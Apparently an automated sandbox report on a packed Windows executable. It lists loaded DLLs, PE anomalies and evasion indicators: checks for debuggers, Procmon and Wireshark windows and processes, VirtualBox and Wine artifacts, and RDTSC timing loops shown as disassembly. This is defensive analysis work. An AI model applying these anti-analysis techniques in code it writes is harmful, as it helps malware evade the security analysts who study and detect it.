Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: kernel.appcore.dll
Source: PqHnYMj5eF.exe | Static file information: File size 4495872 > 1048576
Source: PqHnYMj5eF.exe | Static PE information: Raw size of the blank-named section is bigger than: 0x100000 < 0x288a00
Source: PqHnYMj5eF.exe | Static PE information: Raw size of qmfawksx is bigger than: 0x100000 < 0x1bd400

Data Obfuscation

Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Unpacked PE file: 0.2.PqHnYMj5eF.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qmfawksx:EW;zuykhosy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qmfawksx:EW;zuykhosy:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: PqHnYMj5eF.exe | Static PE information: real checksum: 0x456dfd should be: 0x44ee83
Source: PqHnYMj5eF.exe | Static PE information: section name: (blank)
Source: PqHnYMj5eF.exe | Static PE information: section name: .idata
Source: PqHnYMj5eF.exe | Static PE information: section name: (blank)
Source: PqHnYMj5eF.exe | Static PE information: section name: qmfawksx
Source: PqHnYMj5eF.exe | Static PE information: section name: zuykhosy
Source: PqHnYMj5eF.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_3_0183B160 push eax; ret 0_3_0183B169
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_3_018325E8 push eax; ret 0_3_018325E9
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_007441D0 push eax; mov dword ptr [esp], edx 0_2_007441D5
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00442340 push eax; mov dword ptr [esp], 00000000h 0_2_00442343
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0047C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0047C743
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00400AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00400AC4
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00421430 push eax; mov dword ptr [esp], 00000000h 0_2_00421433
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_004439A0 push eax; mov dword ptr [esp], 00000000h 0_2_004439A3
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0041DAD0 push eax; mov dword ptr [esp], edx 0_2_0041DAD1
Source: PqHnYMj5eF.exe | Static PE information: section name: qmfawksx entropy: 7.956234866264717

Boot Survival

Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Window searched: window name: Regmonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: AA2145 second address: AA214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DBD4 second address: C1DBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DBDC second address: C1DBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DBE2 second address: C1DBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DBE7 second address: C1DBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED65FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DBF9 second address: C1DBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DBFD second address: C1DC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DC0A second address: C1DC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DC0E second address: C1DC14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DC14 second address: C1DC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBCB0E4CF6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DED4 second address: C1DEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: C1DEDB second address: C1DEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E050 second address: C1E066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED6602h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E066 second address: C1E074 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E1E9 second address: C1E1EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E36E second address: C1E372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E372 second address: C1E386 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBCB0ED65F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jnc 00007FBCB0ED65F6h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20C4B second address: C20C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a mov di, C353h 0x0000000e push F1783CEEh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20C63 second address: C20CDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBCB0ED65F8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f add dword ptr [esp], 0E87C392h 0x00000016 mov dword ptr [ebp+129C1BD2h], esi 0x0000001c push 00000003h 0x0000001e pushad 0x0000001f mov ecx, 200F3929h 0x00000024 mov eax, 1BAD6A22h 0x00000029 popad 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FBCB0ED65F8h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 jmp 00007FBCB0ED65FDh 0x0000004e call 00007FBCB0ED65F9h 0x00000053 jg 00007FBCB0ED65FEh 0x00000059 push eax 0x0000005a jbe 00007FBCB0ED6604h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20CDD second address: C20CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20CE1 second address: C20D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0ED6603h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D00 second address: C20D05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D05 second address: C20D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007FBCB0ED65F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D18 second address: C20D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FBCB0E4CF66h 0x0000000c jnp 00007FBCB0E4CF66h 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBCB0E4CF79h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D4B second address: C20D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBCB0ED65F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E14 second address: C20E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov cx, 194Dh 0x0000000d call 00007FBCB0E4CF69h 0x00000012 jnc 00007FBCB0E4CF76h 0x00000018 push eax 0x00000019 push ecx 0x0000001a pushad 0x0000001b jp 00007FBCB0E4CF66h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 pop ecx 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jnp 00007FBCB0E4CF68h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E5B second address: C20E62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E62 second address: C20E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007FBCB0E4CF74h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FBCB0E4CF66h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E8D second address: C20E93 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E93 second address: C20F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBCB0E4CF66h 0x00000009 jnl 00007FBCB0E4CF66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop eax 0x00000013 sub dword ptr [ebp+129C292Fh], ebx 0x00000019 push 00000003h 0x0000001b jmp 00007FBCB0E4CF74h 0x00000020 push 00000000h 0x00000022 sub esi, dword ptr [ebp+129C37C5h] 0x00000028 push 00000003h 0x0000002a jmp 00007FBCB0E4CF73h 0x0000002f push 4571B9BFh 0x00000034 jnp 00007FBCB0E4CF6Eh 0x0000003a jg 00007FBCB0E4CF68h 0x00000040 add dword ptr [esp], 7A8E4641h 0x00000047 movzx edi, si 0x0000004a lea ebx, dword ptr [ebp+12B42B18h] 0x00000050 add edx, dword ptr [ebp+129C38D1h] 0x00000056 xchg eax, ebx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FBCB0E4CF6Fh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20F1B second address: C20F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20F79 second address: C20F8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20F8C second address: C20FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBCB0ED6605h 0x00000013 jmp 00007FBCB0ED65FFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20FAE second address: C21010 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCB0E4CF68h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push edx 0x0000000e mov di, bx 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FBCB0E4CF68h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jp 00007FBCB0E4CF6Ch 0x00000034 mov esi, dword ptr [ebp+129C1BE7h] 0x0000003a movzx esi, si 0x0000003d call 00007FBCB0E4CF69h 0x00000042 jmp 00007FBCB0E4CF73h 0x00000047 push eax 0x00000048 pushad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C21010 second address: C21090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6607h 0x00000009 popad 0x0000000a jg 00007FBCB0ED660Eh 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FBCB0ED6609h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jc 00007FBCB0ED65FCh 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push edx 0x00000026 pop edx 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBCB0ED6604h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C3212F second address: C32149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF76h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4052C second address: C4054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6609h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4054E second address: C40554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40554 second address: C40560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCB0ED65F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40711 second address: C40716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40716 second address: C4071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4071B second address: C4074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBCB0E4CF66h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBCB0E4CF72h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FBCB0E4CF68h 0x0000001c pushad 0x0000001d popad 0x0000001e js 00007FBCB0E4CF68h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40898 second address: C4089E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4089E second address: C408A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C409E3 second address: C40A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6608h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E34 second address: C40E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FBCB0E4CF68h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E41 second address: C40E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E47 second address: C40E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E4D second address: C40E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4110B second address: C4111E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCB0E4CF6Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4111E second address: C41148 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCB0ED65FEh 0x00000008 jbe 00007FBCB0ED65F6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FBCB0ED65FFh 0x00000018 jbe 00007FBCB0ED6602h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41148 second address: C4114E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41266 second address: C41292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBCB0ED65FCh 0x0000000b push esi 0x0000000c jmp 00007FBCB0ED6607h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41292 second address: C4129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C413E2 second address: C413ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C413ED second address: C41435 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCB0E4CF75h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBCB0E4CF73h 0x00000010 pushad 0x00000011 jmp 00007FBCB0E4CF76h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41435 second address: C4144D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBCB0ED6600h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41DEE second address: C41DFA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCB0E4CF66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41DFA second address: C41E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FCh 0x00000007 push ebx 0x00000008 jmp 00007FBCB0ED65FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
